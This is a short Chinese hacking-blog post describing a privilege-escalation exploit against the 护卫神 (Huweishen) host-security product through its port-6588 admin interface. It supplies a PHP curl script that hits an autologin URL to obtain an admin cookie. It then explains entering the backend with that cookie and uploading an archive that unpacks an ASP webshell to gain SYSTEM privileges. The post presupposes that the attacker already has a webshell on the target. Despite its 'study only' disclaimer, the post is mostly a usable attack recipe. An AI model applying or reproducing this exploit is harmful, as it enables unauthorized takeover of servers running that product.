护卫神6588端口提权漏洞

  • 内容
  • 相关

利用条件:

shell权限

可执行脚本

<?php
function httpGet() {
    $url = 'https://www.0dayhack.com:6588/admin/index.asp?f=autologin';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, TRUE);    //表示需要response header
    curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);
    curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
    curl_setopt($ch, CURLOPT_TIMEOUT, 120);
    $result = curl_exec($ch);
    return $result;
}
echo httpGet();
echo asd;
?>
上传脚本访问获取cookie,修改cookie访问:6588/admin/index.asp成功进入后台

利用支持解压包 解压包的内容是asp马 以护卫神的system权限达到提权

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360未收录] | [搜狗已收录]

本文链接:护卫神6588端口提权漏洞 - https://www.0dayhack.com/post-871.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

1条评论
  1. avatar

    地坪漆 Lv.1 Chrome 70.0.3538.25 Chrome 70.0.3538.25 Windows 7 Windows 7 回复

    学会了

    江苏省苏州市 电信